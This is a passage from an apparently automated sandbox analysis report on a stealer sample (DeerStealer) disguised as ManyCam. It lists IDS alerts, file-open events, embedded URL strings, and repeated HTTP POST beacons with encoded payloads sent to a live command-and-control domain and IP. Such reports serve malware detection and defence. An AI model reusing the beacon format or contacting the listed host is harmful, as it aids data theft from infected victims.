                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 4x nop then push ecx1_2_00BC8AFD

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2056550 - Severity 1 - ET MALWARE Win32/DeerStealer CnC Checkin : 192.168.2.4:49741 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2056550 - Severity 1 - ET MALWARE Win32/DeerStealer CnC Checkin : 192.168.2.4:49946 -> 188.114.97.3:443
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global trafficHTTP traffic detected: POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Content-Length: 96Host: nocaryesmoto1.website
                  Source: global trafficHTTP traffic detected: POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5Content-Length: 208Host: nocaryesmoto1.website
                  Source: global trafficHTTP traffic detected: POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5Content-Length: 49746Host: nocaryesmoto1.website
                  Source: global trafficHTTP traffic detected: POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5Content-Length: 745Host: nocaryesmoto1.website
                  Source: global trafficHTTP traffic detected: POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5Content-Length: 212Host: nocaryesmoto1.website
                  Source: global trafficHTTP traffic detected: POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5Content-Length: 35Host: nocaryesmoto1.website
                  Source: global trafficHTTP traffic detected: POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5Content-Length: 86120Host: nocaryesmoto1.website
                  Source: global trafficHTTP traffic detected: POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5Content-Length: 35Host: nocaryesmoto1.website
                  Source: global trafficHTTP traffic detected: POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Content-Length: 96Host: nocaryesmoto1.website
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: nocaryesmoto1.website
                  Source: unknownHTTP traffic detected: POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Content-Length: 96Host: nocaryesmoto1.website
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000003.1710918732.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714817804.00000000005A4000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2147384434.00000000005A4000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://download.manycam.com
                  Source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://download.manycam.com/effects/%s/%s?v=%sBackgroundsDynamicDynamic
                  Source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://download.manycam.com/effects/%s/%s?v=%sManyCam
                  Source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://download.manycam.comNew
                  Source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://download.manycam.comVerdanaThis
                  Source: ManyCam.exeString found in binary or memory: http://manycam.com/feedback/?version=%s
                  Source: ManyCam.exe, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://manycam.com/help/effects
                  Source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://manycam.com/upload_effect?filepath=ManyCam
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                  Source: cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                  Source: ManyCam.exe, 00000001.00000002.1717306561.0000000004963000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772936818.0000000004485000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000000.2000003324.00000001401E0000.00000002.00000001.01000000.0000001B.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.???.xx/?search=%s
